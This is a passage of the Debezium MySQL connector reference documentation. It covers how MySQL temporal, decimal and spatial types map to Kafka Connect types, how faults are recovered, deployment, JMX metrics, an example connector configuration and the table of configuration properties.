epoch, and does not include timezone information.\n\n|`DATETIME(4)`, `DATETIME(5)`, `DATETIME(6)`\n|`INT64`\n|`io.debezium.time.MicroTimestamp`\n| Represents the number of microseconds past epoch, and does not include timezone information.\n\n|=======================\n\nWhen the `time.precision.mode` configuration property is set to `adaptive` (deprecated), then the connector will determine the literal type and semantic type for the temporal types based on the column's data type definition so that events _exactly_ represent the values in the database:\n\n[cols=\"15%a,15%a,35%a,35%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|MySQL Data Type\n|Literal type (schema type)\n|Semantic type (schema name)\n|Notes\n\n|`DATE`\n|`INT32`\n|`io.debezium.time.Date`\n| Represents the number of days since epoch.\n\n|`TIME`, `TIME(0)`, `TIME(1)`, `TIME(2)`, `TIME(3)`\n|`INT32`\n|`io.debezium.time.Time`\n| Represents the number of milliseconds past midnight, and does not include timezone information.\n\n|`TIME(4)`, `TIME(5)`, `TIME(6)`\n|`INT64`\n|`io.debezium.time.MicroTime`\n| Represents the number of microseconds past midnight, and does not include timezone information.\n\n|`DATETIME`, `DATETIME(0)`, `DATETIME(1)`, `DATETIME(2)`, `DATETIME(3)`\n|`INT64`\n|`io.debezium.time.Timestamp`\n| Represents the number of milliseconds past epoch, and does not include timezone information.\n\n|`DATETIME(4)`, `DATETIME(5)`, `DATETIME(6)`\n|`INT64`\n|`io.debezium.time.MicroTimestamp`\n| Represents the number of microseconds past epoch, and does not include timezone information.\n\n|=======================\n\nWhen the `time.precision.mode` configuration property is set to `connect`, then the connector will use the predefined Kafka Connect logical types as was the case with the 0.2.x MySQL connector. This may be useful when consumers only know about the built-in Kafka Connect logical types and are unable to handle variable-precision time values. On the other hand, since MySQL allows both `TIME` and `DATETIME` to have _fractional second precision_ of 0-6 to store up to microsecond precision, the events generated by a connector with the `connect` time precision mode will _*result in a loss of precision*_ when the database column has a _fractional second precision_ value greater than 3:\n\n[cols=\"15%a,15%a,35%a,35%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|MySQL Data Type\n|Literal type (schema type)\n|Semantic type (schema name)\n|Notes\n\n|`DATE`\n|`INT32`\n|`org.apache.kafka.connect.data.Date`\n| Represents the number of days since epoch.\n\n|`TIME[(M)]`\n|`INT64`\n|`org.apache.kafka.connect.data.Time`\n| Represents the number of milliseconds since midnight, and does not include timezone information. MySQL allows `M` to be in the range 0-6 to store up to microsecond precision, though this mode results in a loss of precision when `M` > 3.\n\n|`DATETIME[(M)]`\n|`INT64`\n|`org.apache.kafka.connect.data.Timestamp`\n| Represents the number of milliseconds since epoch, and does not include timezone information. MySQL allows `M` to be in the range 0-6 to store up to microsecond precision, though this mode results in a loss of precision when `M` > 3.\n\n|=======================\n\n[[zero-values]]\nMySQL allows http:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/date-and-time-types.html[zero-values] for `DATE`, `DATETIME`, and `TIMESTAMP` columns, which are sometimes preferred over null values. These values cannot be represented using any of the Java types with either of the `time.precision.mode` options, and therefore the MySQL connector will represent them as `null` values when the column definition allows nulls, or as the _epoch day_ when the column does not allow nulls.\n\n[[temporal-values-without-timezone]]\n===== Temporal values without time zone\n\nThe `DATETIME` type represents a local date and time such as \"2018-01-13 09:48:27\",\ni.e. there's no time zone information.\nSuch columns are converted into epoch milli-seconds or micro-seconds (based on the column's precision) using UTC.\nSo e.g. the value \"2018-06-20 06:37:03\" of a column of type `DATETIME` (no precision given) will be represented by the value 1529476623000.\n\nThe `TIMESTAMP` type represents a timestamp without time zone information and is converted by MySQL from the server (or session's) current time zone into UTC when writing and vice versa when reading back the value.\nSuch columns are converted into an equivalent `io.debezium.time.ZonedTimestamp` in UTC based on the server (or session's) current time zone.\nThe timezone will be queried from the server by default.\nIf this fails, it must be specified explicitly as a connector option using the `database.serverTimezone` option.\nSo if for instance the database's time zone (either globally or configured for the connector by means of aforementioned option) is \"America\/Los_Angeles\",\nthe `TIMESTAMP` value \"2018-06-20 06:37:03\" will be represented by a `ZonedTimestamp` with the value \"2018-06-20T13:37:03Z\".\n\nNote that the timezone of the JVM running Kafka Connect and Debezium does not affect these conversions.\n\n[WARNING]\n====\nThe handling of these column types is based on using the non-legacy date\/time handling mode of the MySQL JDBC connector.\nIt is therefore strongly advised against passing the `database.useLegacyDatetimeCode` connector option with a value of `false`,\nas that may result in unexpected values of temporal columns in emitted change data messages.\n====\n\n[[decimal-values]]\n==== Decimal values\n\nWhen `decimal.handling.mode` configuration property is set to `precise`, then the connector will use the predefined Kafka Connect `org.apache.kafka.connect.data.Decimal` logical type for all `DECIMAL` and `NUMERIC` columns. This is the default mode.\n\n[cols=\"15%a,15%a,35%a,35%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|MySQL Data Type\n|Literal type (schema type)\n|Semantic type (schema name)\n|Notes\n\n|`NUMERIC[(M[,D])]`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal`\n|The `scaled` schema parameter contains an integer representing how many digits the decimal point was shifted.\n\n|`DECIMAL[(M[,D])]`\n|`BYTES`\n|`org.apache.kafka.connect.data.Decimal`\n|The `scaled` schema parameter contains an integer representing how many digits the decimal point was shifted.\n\n|=======================\n\nHowever, when `decimal.handling.mode` configuration property is set to `double`, then the connector will represent all `DECIMAL` and `NUMERIC` values as Java double values and encodes them as follows:\n\n[cols=\"15%a,15%a,35%a,35%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|MySQL Data Type\n|Literal type (schema type)\n|Semantic type (schema name)\n|Notes\n\n|`NUMERIC[(M[,D])]`\n|`FLOAT64`\n|\n|\n\n|`DECIMAL[(M[,D])]`\n|`FLOAT64`\n|\n|\n\n|=======================\n\nThe last option for `decimal.handling.mode` configuration property is `string`. In this case the connector will represent all `DECIMAL` and `NUMERIC` values as their formatted string representation and encodes them as follows:\n\n[cols=\"15%a,15%a,35%a,35%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|MySQL Data Type\n|Literal type (schema type)\n|Semantic type (schema name)\n|Notes\n\n|`NUMERIC[(M[,D])]`\n|`STRING`\n|\n|\n\n|`DECIMAL[(M[,D])]`\n|`STRING`\n|\n|\n\n|=======================\n\n[[spatial-types]]\n==== Spatial Data Types\n\nAs of version 0.5.1, the MySQL connector also has limited support for some of the following https:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/spatial-datatypes.html[spatial data types]:\n\n[cols=\"20%a,15%a,30%a,35%a\",width=150,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Spatial Data Type\n|Literal type (schema type)\n|Semantic type (schema name)\n|Notes\n\n|`POINT`\n|`STRUCT`\n|`io.debezium.data.geometry.Point`\n|Contains a structure with 2 `FLOAT64` fields - `(x,y)` - each representing the coordinates of a geometric point and 1 optional `BYTES` field - `wkb` - representing the Well-Known Binary (WKB) of the coordinates of a geometric point\n\n|=======================\n\nAs of version 0.7.2, the MySQL connector has full support for all of the following https:\/\/dev.mysql.com\/doc\/refman\/5.7\/en\/spatial-datatypes.html[spatial data types]:\n\n[cols=\"20%a,15%a,30%a,35%a\",width=150,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Spatial Data Type\n|Literal type (schema type)\n|Semantic type (schema name)\n|Notes\n|`GEOMETRY` +\n`LINESTRING` +\n`POLYGON` +\n`MULTIPOINT` +\n`MULTILINESTRING` +\n`MULTIPOLYGON` +\n`GEOMETRYCOLLECTION`\n|`STRUCT`\n|`io.debezium.data.geometry.Geometry`\n|Contains a structure with 2 fields +\n\n* `srid (INT32)` - Spatial Reference System Identifier defining what type of geometry object is stored in the structure\n* `wkb (BYTES)` - a binary representation of the geometry object encoded in the Well-Known-Binary format.\nPlease see http:\/\/www.opengeospatial.org\/standards\/sfa[Open Geospatial Consortium Simple Features Access specification] for the format details.\n\n|=======================\n\n[[fault-tolerance]]\n[[when-things-go-wrong]]\n=== When things go wrong\n\nDebezium is a distributed system that captures all changes in multiple upstream databases, and will never miss or lose an event. Of course, when the system is operating nominally or being administered carefully, then Debezium provides _exactly once_ delivery of every change event. However, if a fault does happen then the system will still not lose any events, although while it is recovering from the fault it may repeat some change events. Thus, in these abnormal situations Debezium (like Kafka) provides _at least once_ delivery of change events.\n\nThe rest of this section describes how Debezium handles various kinds of faults and problems.\n\n==== Configuration and startup errors\n\nThe connector will fail upon startup, report an error\/exception in the log, and stop running when the connector's configuration is invalid, when the connector cannot successfully connect to MySQL using the specified connectivity parameters, or when the connector is restarting from a previously-recorded position in the MySQL history (via binlog coordinates or GTID set) and MySQL no longer has that history available.\n\nIn these cases, the error will have more details about the problem and possibly a suggested work around. The connector can be restarted when the configuration has been corrected or the MySQL problem has been addressed.\n\n==== MySQL becomes unavailable\n\nOnce the connector is running, if the MySQL server it has been connected to becomes unavailable for any reason, the connector will fail with an error and the connector will stop. Simply restart the connector when the server is available.\n\nNote that when using GTIDs and a highly available MySQL cluster, you can simply restart the connector immediately, and the connector will connect to a different MySQL server in the cluster, find the location in that server's binlog that represents the last transaction that was processed completely, and start reading the new server's binlog from that location.\n\nWhen the connector and MySQL are not using GTIDs, the connector records the position within the specific binlog of the MySQL server to which it is connected. These binlog coordinates are only valid on that MySQL server, so to recover the connector must do so only by connecting to that server (or to another server that has been recovered from backups of the MySQL server).\n\n==== Kafka Connect process stops gracefully\n\nIf Kafka Connect is being run in distributed mode, and a Kafka Connect process is stopped gracefully, then prior to shutdown of that processes Kafka Connect will migrate all of the process' connector tasks to another Kafka Connect process in that group, and the new connector tasks will pick up exactly where the prior tasks left off. There will be a short delay in processing while the connector tasks are stopped gracefully and restarted on the new processes.\n\n==== Kafka Connect process crashes\n\nIf the Kafka Connector process stops unexpectedly, then any connector tasks it was running will obviously terminate without recording their most recently-processed offsets. When Kafka Connect is being run in distributed mode, it will restart those connector tasks on other processes. However, the MySQL connectors will resume from the last offset _recorded_ by the earlier processes, which means that the new replacement tasks may generate some of the same change events that were processed just prior to the crash. The number of duplicate events will depend on the offset flush period and the volume of data changes just before the crash.\n\n[TIP]\n====\nBecause there is a chance that some events may be duplicated during a recovery from failure, consumers should always anticipate some events may be duplicated. Debezium change are idempotent, so a sequence of events always results in the same state.\n\nDebezium also includes with each change event message the source-specific information about the origin of the event, including the MySQL server's time of the event, its binlog filename and position, and GTID (if used). Consumers can keep track of this information (especially GTIDs) to know whether it has already seen a particular event.\n====\n\n==== Kafka becomes unavailable\n\nAs the connector generates change events, the Kafka Connect framework records those events in Kafka using the Kafka producer API. Kafka Connect will also periodically record the latest offset that appears in those change events, at a frequency you've specified in the Kafka Connect worker configuration. If the Kafka brokers become unavailable, the Kafka Connect worker process running the connectors will simply repeatedly attempt to reconnect to the Kafka brokers. In other words, the connector tasks will simply pause until a connection can be reestablished, at which point the connectors will resume exactly where they left off.\n\n==== Connector is stopped for a duration\n\nIf the connector is gracefully stopped, the database can continue to be used and any new changes will be recorded in the MySQL server's binlog. When the connector is restarted, it will resume reading the MySQL binlog where it last left off, recording change events for all of the changes that were made while the connector was stopped.\n\nA properly configured Kafka cluster is able to https:\/\/engineering.linkedin.com\/kafka\/benchmarking-apache-kafka-2-million-writes-second-three-cheap-machines[massive throughput]. Kafka Connect is written with Kafka best practices, and given enough resources will also be able to handle very large numbers of database change events. Because of this, when a connector has been restarted after a while, it is very likely to catch up with the database, though how quickly will depend upon the capabilities and performance of Kafka and the volume of changes being made to the data in MySQL.\n\n[NOTE]\n====\nIf the connector remains stopped for long enough, MySQL might purge older binlog files and the connector's last position may be lost. In this case, when the connector configured with _initial_ snapshot mode (the default) is finally restarted, the MySQL server will no longer have the starting point and the connector will perform an initial snapshot. On the other hand, if the connector's snapshot mode is disabled, then the connector will fail with an error.\n====\n\n[[configuration]]\n[[deploying-a-connector]]\n== Deploying a connector\n\nIf you've already installed https:\/\/zookeeper.apache.org[Zookeeper], http:\/\/kafka.apache.org\/[Kafka], and http:\/\/kafka.apache.org\/documentation.html#connect[Kafka Connect], then using Debezium's MySQL connector is easy. Simply download the https:\/\/repo1.maven.org\/maven2\/io\/debezium\/debezium-connector-mysql\/{debezium-version}\/debezium-connector-mysql-{debezium-version}-plugin.tar.gz[connector's plugin archive], extract the JARs into your Kafka Connect environment, and add the directory with the JARs to https:\/\/docs.confluent.io\/current\/connect\/userguide.html#installing-plugins[Kafka Connect's classpath]. Restart your Kafka Connect process to pick up the new JARs.\n\nIf immutable containers are your thing, then check out https:\/\/hub.docker.com\/r\/debezium\/[Debezium's Docker images] for Zookeeper, Kafka, and Kafka Connect with the MySQL connector already pre-installed and ready to go. Our link:http:\/\/debezium.io\/docs\/tutorial[tutorial] even walks you through using these images, and this is a great way to learn what Debezium is all about. You can even link:\/blog\/2016\/05\/31\/Debezium-on-Kubernetes\/[run Debezium on Kubernetes and OpenShift].\n\nTo use the connector to produce change events for a particular MySQL server or cluster, simply create a link:#configuration[configuration file for the MySQL Connector] and use the link:https:\/\/docs.confluent.io\/current\/connect\/references\/restapi.html[Kafka Connect REST API] to add that connector to your Kafka Connect cluster. When the connector starts, it will grab a consistent snapshot of the databases in your MySQL server and start reading the MySQL binlog, producing events for every inserted, updated, and deleted row. The connector can optionally produce events with the DDL statements that were applied, and you can even choose to produce events for a subset of the databases and tables. Optionally ignore, mask, or truncate columns that are sensitive, too large, or not needed.\n\n[[monitoring]]\n=== Monitoring\n\nKafka, Zookeeper, and Kafka Connect all have link:\/docs\/monitoring\/[built-in support] for JMX metrics. The MySQL connector also publishes a number of metrics about the connector's activities that can be monitored through JMX. The connector has two types of metrics. Snapshot metrics help you monitor the snapshot activity and are available when the connector is performing a snapshot. Binlog metrics help you monitor the progress and activity while the connector reads the MySQL binlog.\n\n[[monitoring-snapshots]]\n[[snapshot-metrics]]\n==== Snapshot Metrics\n\n===== *MBean: debezium.mysql:type=connector-metrics,context=snapshot,server=_<database.server.name>_*\n\n[cols=\"30%a,10%a,60%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Attribute Name\n|Type\n|Description\n\n|`TotalTableCount`\n|`int`\n|The total number of tables that are being included in the snapshot.\n\n|`RemainingTableCount`\n|`int`\n|The number of tables that the snapshot has yet to copy.\n\n|`HoldingGlobalLock`\n|`boolean`\n|Whether the connector currently holds a global or table write lock.\n\n|`SnapshotRunning`\n|`boolean`\n|Whether the snapshot was started.\n\n|`SnapshotAborted`\n|`boolean`\n|Whether the snapshot was aborted.\n\n|`SnapshotCompleted`\n|`boolean`\n|Whether the snapshot completed.\n\n|`SnapshotDurationInSeconds`\n|`long`\n|The total number of seconds that the snapshot has taken so far, even if not complete.\n\n|`RowsScanned`\n|`Map<String, Long>`\n|Map containing the number of rows scanned for each table in the snapshot. Tables are incrementally added to the Map during processing. Updates every 10,000 rows scanned and upon completing a table.\n|=======================\n\n\n[[monitoring-binlog]]\n[[binlog-metrics]]\n==== Binlog Metrics\n\n===== *MBean: debezium.mysql:type=connector-metrics,context=binlog,server=_<database.server.name>_*\n\n[cols=\"30%a,10%a,60%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Attribute Name\n|Type\n|Description\n\n|`Connected`\n|`boolean`\n|Flag that denotes whether the connector is currently connected to the MySQL server.\n\n|`BinlogFilename`\n|`string`\n|The name of the binlog filename that the connector has most recently read.\n\n|`BinlogPosition`\n|`long`\n|The most recent position (in bytes) within the binlog that the connector has read.\n\n|`IsGtidModeEnabled`\n|`boolean`\n|Flag that denotes whether the connector is currently tracking GTIDs from MySQL server.\n\n|`GtidSet`\n|`string`\n|The string representation of the most recent GTID set seen by the connector when reading the binlog.\n\n|`LastEvent`\n|`string`\n|The last binlog event that the connector has read.\n\n|`SecondsSinceLastEvent`\n|`long`\n|The number of seconds since the connector has read and processed the most recent event.\n\n|`SecondsBehindMaster`\n|`long`\n|The number of seconds between the last event's MySQL timestamp and the connector processing it. The values will incorporate any differences between the clocks on the machines where the MySQL server and the MySQL connector are running.\n\n|`TotalNumberOfEventsSeen`\n|`long`\n|The total number of events that this connector has seen since last started or reset.\n\n|`NumberOfSkippedEvents`\n|`long`\n|The number of events that have been skipped by the MySQL connector. Typically events are skipped due to a malformed or unparseable event from MySQL's binlog.\n\n|`NumberOfEventsFiltered`\n|`long`\n|The number of events that have been filtered by whitelist or blacklist filtering rules configured on the connector.\n\n|`NumberOfDisconnects`\n|`long`\n|The number of disconnects by the MySQL connector.\n\n|`NumberOfCommittedTransactions`\n|`long`\n|The number of processed transactions that were committed.\n\n|`NumberOfRolledBackTransactions`\n|`long`\n|The number of processed transactions that were rolled back and not streamed.\n\n|`NumberOfNotWellFormedTransactions`\n|`long`\n|The number of transactions that have not conformed to expected protocol `BEGIN` + `COMMIT`\/`ROLLBACK`. Should be `0` under normal conditions.\n\n|`NumberOfLargeTransactions`\n|`long`\n|The number of transactions that have not fitted into the look-ahead buffer. Should be significantly smaller than `NumberOfCommittedTransactions` and `NumberOfRolledBackTransactions` for optimal performance.\n|=======================\n_Note:_ The transactions related attributes are available only if binlog event buffering is enabled - see `binlog.buffer.size` for more details\n\n\n\n[[example]]\n[[example-configuration]]\n=== Example configuration\n\nUsing the MySQL connector is straightforward. Here is an example of the configuration for a MySQL connector that monitors a MySQL server at port 3306 on 192.168.99.100, which we logically name `fullfillment`:\n\n[source,json]\n----\n{\n \"name\": \"inventory-connector\", \/\/ <1>\n \"config\": {\n \"connector.class\": \"io.debezium.connector.mysql.MySqlConnector\", \/\/ <2>\n \"database.hostname\": \"192.168.99.100\", \/\/ <3>\n \"database.port\": \"3306\", \/\/ <4>\n \"database.user\": \"debezium\", \/\/ <5>\n \"database.password\": \"dbz\", \/\/ <6>\n \"database.server.id\": \"184054\", \/\/ <7>\n \"database.server.name\": \"fullfillment\", \/\/ <8>\n \"database.whitelist\": \"inventory\", \/\/ <9>\n \"database.history.kafka.bootstrap.servers\": \"kafka:9092\", \/\/ <10>\n \"database.history.kafka.topic\": \"dbhistory.fullfillment\", \/\/ <11>\n \"include.schema.changes\": \"true\" \/\/ <12>\n }\n}\n----\n<1> The name of our connector when we register it with a Kafka Connect service.\n<2> The name of this MySQL connector class.\n<3> The address of the MySQL server.\n<4> The port number of the MySQL server.\n<5> The name of the MySQL user that has the link:#mysql-user[required privileges].\n<6> The password for the MySQL user that has the link:#mysql-user[required privileges].\n<7> The connector's identifier that must be unique within the MySQL cluster and similar to MySQL's `server-id` configuration property.\n<8> The logical name of the MySQL server\/cluster, which forms a namespace and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the link:#avro-converter[Avro Connector] is used.\n<9> A list of all databases hosted by this server that this connector will monitor. This is optional, and there are other properties for listing the databases and tables to include or exclude from monitoring.\n<10> The list of Kafka brokers that this connector will use to write and recover DDL statements to the database history topic.\n<11> The name of the link:#database-schema-history[database history topic] where the connector will write and recover DDL statements. This topic is for internal use only and should not be used by consumers.\n<12> The flag specifying that the connector should generate on the link:#schema-change-topic[schema change topic] named `fullfillment` events with the DDL changes that _can_ be used by consumers.\n\nSee the link:#connector-properties[complete list of connector properties] that can be specified in these configurations.\n\nThis configuration can be sent via POST to a running Kafka Connect service, which will then record the configuration and start up the one connector task that will connect to the MySQL database, read the binlog, and record events to Kafka topics.\n\n\n[[connector-properties]]\n=== Connector properties\n\nThe following configuration properties are _required_ unless a default value is available.\n\n[cols=\"35%a,10%a,55%a\",options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Property\n|Default\n|Description\n\n|`name`\n|\n|Unique name for the connector. Attempting to register again with the same name will fail. (This property is required by all Kafka Connect connectors.)\n\n|`connector.class`\n|\n|The name of the Java class for the connector. Always use a value of `io.debezium{zwsp}.connector.mysql.MySqlConnector` for the MySQL connector.\n\n|`tasks.max`\n|`1`\n|The maximum number of tasks that should be created for this connector. The MySQL connector always uses a single task and therefore does not use this value, so the default is always acceptable.\n\n|`database.hostname`\n|\n|IP address or hostname of the MySQL database server.\n\n|`database.port`\n|`3306`\n|Integer port number of the MySQL database server.\n\n|`database.user`\n|\n|Name of the MySQL database to use when connecting to the MySQL database server.\n\n|`database.password`\n|\n|Password to use when connecting to the MySQL database server.\n\n|`database.server.name`\n|_host:port_\n|Logical name that identifies and provides a namespace for the particular MySQL database server\/cluster being monitored. The logical name should be unique across all other connectors, since it is used as a prefix for all Kafka topic names emanating from this connector. Defaults to '_host_:_port_', where _host_ is the value of the `database.hostname` property and _port_ is the value of the `database.port` property, though we recommend using an explicit and meaningful logical name.\n\n|`database.server.id`\n|_random_\n|A numeric ID of this database client, which must be unique across all currently-running database processes in the MySQL cluster. This connector joins the MySQL database cluster as another server (with this unique ID) so it can read the binlog. By default, a random number is generated between 5400 and 6400, though we recommend setting an explicit value.\n\n|`database.history.kafka.topic`\n|\n|The full name of the Kafka topic where the connector will store the database schema history.\n\n|`database.history{zwsp}.kafka.bootstrap.servers`\n|\n|A list of host\/port pairs that the connector will use for establishing an initial connection to the Kafka cluster. This connection will be used for retrieving database schema history previously stored by the connector, and for writing each DDL statement read from the source database. This should point to the same Kafka cluster used by the Kafka Connect process.\n\n|`database.whitelist`\n|_empty string_\n|An optional comma-separated list of regular expressions that match database names to be monitored; any database name not included in the whitelist will be excluded from monitoring. By default all databases will be monitored. May not be used with `database.blacklist`.\n\n|`database.blacklist`\n|_empty string_\n|An optional comma-separated list of regular expressions that match database names to be excluded from monitoring; any database name not included in the blacklist will be monitored. May not be used with `database.whitelist`.\n\n|`table.whitelist`\n|_empty string_\n|An optional comma-separated list of regular expressions that match fully-qualified table identifiers for tables to be monitored; any table not included in the whitelist will be excluded from monitoring. Each identifier is of the form _databaseName_._tableName_. By default the connector will monitor every non-system table in each monitored database. May not be used with `table.blacklist`.\n\n|`table.blacklist`\n|_empty string_\n|An optional comma-separated list of regular expressions that match fully-qualified table identifiers for tables to be excluded from monitoring; any table not included in the blacklist will be monitored. Each identifier is of the form _databaseName_._tableName_. May not be used with `table.whitelist`.\n\n|`column.blacklist`\n|_empty string_\n|An optional comma-separated list of regular expressions that match the fully-qualified names of columns that should be excluded from change event message values. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_, or _databaseName_._schemaName_._tableName_._columnName_.\n\n|`column.truncate.to._length_.chars`\n|_n\/a_\n|An optional comma-separated list of regular expressions that match the fully-qualified names of character-based columns whose values should be truncated in the change event message values if the field values are longer than the specified number of characters. Multiple properties with different lengths can be used in a single configuration, although in each the length must be a positive integer. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_, or _databaseName_._schemaName_._tableName_._columnName_.\n\n|`column.mask.with._length_.chars`\n|_n\/a_\n|An optional comma-separated list of regular expressions that match the fully-qualified names of character-based columns whose values should be replaced in the change event message values with a field value consisting of the specified number of asterisk (`*`) characters. Multiple properties with different lengths can be used in a single configuration, although in each the length must be a positive integer. Fully-qualified names for columns are of the form _databaseName_._tableName_._columnName_, or _databaseName_._schemaName_._tableName_._columnName_.\n\n|`column.propagate.source.type` 0.8.0 and later\n|_n\/a_\n|An optional comma-separated list of regular expressions that match the fully-qualified names of columns whose original type and length should be added as a parameter to the corresponding field schemas in the emitted change messages.\nThe schema parameters `pass:[_]pass:[_]debezium.source.column.type`, `pass:[_]pass:[_]debezium.source.column.length` and `pass:[_]debezium.source.column.scale` will be used to propagate the original type name and length (for variable-width types), respectively.\nUseful to properly size corresponding columns in sink databases.\nFully-qualified names for columns are of the form _databaseName_._tableName_._columnName_, or _databaseName_._schemaName_._tableName_._columnName_.\n\n|`time.precision.mode`\n|`adaptive_time{zwsp}_microseconds`\n| Time, date, and timestamps can be represented with different kinds of precision, including: `adaptive_time_microseconds` (the default) captures the date, datetime and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type, with the exception of TIME type fields, which are always captured as microseconds; `adaptive` (deprecated) captures the time and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type; or `connect` always represents time and timestamp values using Kafka Connect's built-in representations for Time, Date, and Timestamp, which uses millisecond precision regardless of the database columns' precision. See <<temporal-values>>.\n\n|`decimal.handling.mode` +\n`string` in 0.7.4 and later\n|`precise`\n| Specifies how the connector should handle values for `DECIMAL` and `NUMERIC` columns: `precise` (the default) represents them precisely using `java.math.BigDecimal` values represented in change events in a binary form; or `double` represents them using `double` values, which may result in a loss of precision but will be far easier to use. `string` option encodes values as formatted string which is easy to consume but a semantic information about the real type is lost. See <<decimal-values>>.\n\n|`bigint.unsigned.handling.mode` +\n0.6.1 and later\n|`long`\n| Specifies how BIGINT UNSIGNED columns should be represented in change events, including: `precise` uses `java.math.BigDecimal` to represent values, which are encoded in the change events using a binary representation and Kafka Connect's `org.apache.kafka.connect.data.Decimal` type; `long` (the default) represents values using Java's `long`, which may not offer the precision but will be far easier to use in consumers. `long` is usually the preferable setting. Only when working with values larger than 2^63, the `precise` setting should be used as those values can't be conveyed using `long`. See <<data-types>>.\n\n|`include.schema.changes`\n|`true`\n|Boolean value that specifies whether the connector should publish changes in the database schema to a Kafka topic with the same name as the database server ID. Each schema change will be recorded using a key that contains the database name and whose value includes the DDL statement(s). This is independent of how the connector internally records database history. The default is `true`.\n\n|`include.query`\n|`false`\n|Boolean value that specifies whether the connector should include the original SQL query that generated the change event. +\nNote: This option requires MySQL be configured with the binlog_rows_query_log_events option set to ON. Query will not be present for events generated from the snapshot process. +\nWARNING: Enabling this option may expose tables or fields explicitly blacklisted or masked by including the original SQL statement in the change event. For this reason this option is defaulted to 'false'.\n\n|`event.deserialization{zwsp}.failure.handling.mode` +\n0.6.2 and later\n|`fail`\n| Specifies how the connector should react to exceptions during deserialization of binlog events.\n`fail` will propagate the exception (indicating the problematic event and its binlog offset), causing the connector to stop. +\n`warn` will cause the problematic event to be skipped and the problematic event and its binlog offset to be logged\n(make sure that link:\/docs\/configuration\/logging\/[the logger] is set to the `WARN` or `ERROR` level). +\n`ignore` will cause problematic event will be skipped.\n\n|`inconsistent.schema.handling.mode` +\n0.7.3 and later\n|`fail`\n| Specifies how the connector should react to binlog events that relate to tables that are not present in internal schema representation (i.e. internal representation is not consistent with database)\n`fail` will throw an exception (indicating the problematic event and its binlog offset), causing the connector to stop. +\n`warn` will cause the problematic event to be skipped and the problematic event and its binlog offset to be logged\n(make sure that link:\/docs\/configuration\/logging\/[the logger] is set to the `WARN` or `ERROR` level). +\n`ignore` will cause the problematic event to be skipped.\n\n|`max.queue.size`\n|`8192`\n|Positive integer value that specifies the maximum size of the blocking queue into which change events read from the database log are placed before they are written to Kafka. This queue can provide backpressure to the binlog reader when, for example, writes to Kafka are slower or if Kafka is not available. Events that appear in the queue are not included in the offsets periodically recorded by this connector. Defaults to 8192, and should always be larger than the maximum batch size specified in the `max.batch.size` property.\n\n|`max.batch.size`\n|`2048`\n|Positive integer value that specifies the maximum size of each batch of events that should be processed during each iteration of this connector. Defaults to 2048.\n\n|`poll.interval.ms`\n|`1000`\n|Positive integer value that specifies the number of milliseconds the connector should wait during each iteration for new change events to appear. Defaults to 1000 milliseconds, or 1 second.\n\n|`connect.timeout.ms`\n|`30000`\n|A positive integer value that specifies the maximum time in milliseconds this connector should wait after trying to connect to the MySQL database server before timing out. Defaults to 30 seconds.\n\n|`gtid.source.includes`\n|\n|A comma-separated list of regular expressions that match source UUIDs in the GTID set used to find the binlog position in the MySQL server. Only the GTID ranges that have sources matching one of these include patterns will be used. May not be used with `gtid.source.excludes`.\n\n|`gtid.source.excludes`\n|\n|A comma-separated list of regular expressions that match source UUIDs in the GTID set used to find the binlog position in the MySQL server. Only the GTID ranges that have sources matching none of these exclude patterns will be used. May not be used with `gtid.source.includes`.\n\n|`gtid.new.channel.position` +\n0.9.0 and later\n|`latest`\n| When set to `latest`, when the connector sees a new GTID channel, it will start consuming from the last executed transaction in that GTID channel. If set to `earliest`, the connector starts reading that channel from the first available (not purged) GTID position. `earliest` is useful when you have a active-passive MySQL setup where Debezium is connected to master, in this case during failover the slave with new UUID (and GTID channel) starts receiving writes before Debezium is connected. These writes would be lost when using `latest`.\n\n|`tombstones.on.delete` +\n0.7.3 and later\n|`true`\n| Controls whether a tombstone event should be generated after a delete event. +\nWhen `true` the delete operations are represented by a delete event and a subsequent tombstone event. When `false` only a delete event is sent. +\nEmitting the tombstone event (the default behavior) allows Kafka to completely delete all events pertaining to the given key once the source record got deleted.\n\n|`ddl.parser.mode` +\n0.8.0 and later\n|`antlr`\n| Controls which parser should be used for parsing DDL statements when building up the meta-model of the captured database structure. +\nCan be one of `legacy` (for the legacy hand-written parser implementation) or `antlr` (for new Antlr based implementation introduced in Debezium 0.8.0). +\nWhile the legacy parser remains the default for Debezium 0.8.x, please try out the new implementation and report back any issues you encounter. +\nThe new parser is the default as of 0.9, followed by the removal of the old implementation in a future version.\n\n|=======================\n\n\nThe following _advanced_ configuration properties have good defaults that will work in most situations and therefore rarely need to be specified in the connector's configuration.\n\n[cols=\"35%a,10%a,55%a\",width=100,options=\"header,footer\",role=\"table table-bordered table-striped\"]\n|=======================\n|Property\n|Default\n|Description\n\n|`connect.keep.alive`\n|`true`\n|A boolean value that specifies whether a separate thread should be used to ensure the connection to the MySQL server\/cluster is kept alive.\n\n|`table.ignore.builtin`\n|`true`\n|Boolean value that specifies whether built-in system tables should be ignored. This applies regardless of the table whitelist or blacklists. By default system tables are excluded from monitoring, and no events are generated when changes are made to any of the system tables.\n\n|`database.history.kafka.recovery.poll.interval.ms`\n|`100`\n|An integer value that specifies the maximum number of milliseconds the connector should wait during startup\/recovery while polling for persisted data. The default is 100ms.\n\n|`database.history.kafka.recovery.attempts`\n|`4`\n|The maximum number of times that the connector should attempt to read persisted history data before the connector recovery fails with an error. The maximum amount of time to wait 